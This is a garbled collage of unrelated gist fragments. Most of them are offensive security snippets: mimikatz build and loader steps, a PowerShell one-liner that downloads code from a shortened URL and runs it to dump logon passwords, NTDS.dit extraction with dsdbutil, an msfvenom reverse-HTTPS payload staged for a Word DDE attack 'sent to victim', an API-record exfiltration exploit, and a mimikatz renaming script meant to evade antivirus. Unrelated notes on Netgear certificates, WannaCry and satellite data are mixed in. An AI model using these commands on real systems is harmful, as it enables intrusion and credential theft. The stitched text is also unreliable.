There are at least two valid, signed TLS certificates that are bundled with publicly available Netgear device firmware.
These certificates are trusted by browsers on all platforms, but will surely be added to revocation lists shortly.
The firmware images that contained these certificates along with their private keys were publicly available for download through Netgear's support website, without authentication; thus anyone in the world could have retrieved these keys.
| 1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
| 2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a | |
| 3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code. | |
| 4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file. | |
| 6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs" | |
| DSDButil | |
| ======== | |
| - dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)] | |
| - dsdbutil supports VSS snapshot creation | |
| - dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py) | |
| - Example #1: Using Snapshot GUID obtained from cmd output | |
| dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit" |
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |
| powershell -ExecutionPolicy Bypass -noLogo -Command (new-object System.Net.WebClient).DownloadFile('https://is.gd/Dopn98','katz.cs'); && cd c:\Windows\Microsoft.NET\Framework64\v4.* && csc.exe /unsafe /reference:System.IO.Compression.dll /out:katz.exe katz.cs && InstallUtil.exe /logfile= /LogToConsole=false /U katz.exe && katz.exe log privilege::debug sekurlsa::logonpasswords exit && del katz.* |
| git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH | |
| IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'` | |
| msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin | |
| PAYLOAD=$(cat payload.bin | base64 -w 0) | |
| sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs | |
| sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta | |
| cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta | |
| service apache2 start | |
| echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\ |
www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).update: A minor variant of the viru
| #!/bin/bash | |
| cat $1 | grep '^IRA:' > $1_positions.csv | |
| sed -i -e 's/^.\+sat:/sat:/' -e 's/\( RAI\:.\+\)\|\(sat:\)\|\(beam:\)\|\(pos=(\)\|\()\)\|\(alt=\)\|\(+\)//g' -e 's%/%;%' -e 's/ /;/g' -e '/^00;00/d' -e 's/$/000/g' -e '/[0-9]\+;[0-9]\+;\([0-9]\+\|-[0-9]\+\).[0-9]\+;\([0-9]\+\|-[0-9]\+\).[0-9]\+;[0-9]\+/!d' $1_positions.csv | |
| awk -F ';' '($5<=100000){print}' $1_positions.csv > $1_positions_spotbeams.csv | |
| awk -F ';' '($5>100000){print}' $1_positions.csv > $1_positions_satellites.csv | |
| sed -i '1 i\satellite;beam;latitude;longitude;altitude' $1_positions*.csv |
| # This script downloads and slightly "obfuscates" the mimikatz project. | |
| # Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "[email protected]" ..., | |
| # so removing them from the project before compiling gets us past most of the AV solutions. | |
| # We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
| # but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
| git clone https://github.com/gentilkiwi/mimikatz.git windows | |
| mv windows/mimikatz windows/windows | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
| find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
| #!/bin/bash | |
| # | |
| # Attack created by Mubix. For more information see: | |
| # https://room362.com/post/2016/snagging-creds-from-locked-machines | |
| # Modified for Nethunter by Binkybear | |
| # | |
| # ================== # | |
| # Check for root | |
| # ================== # |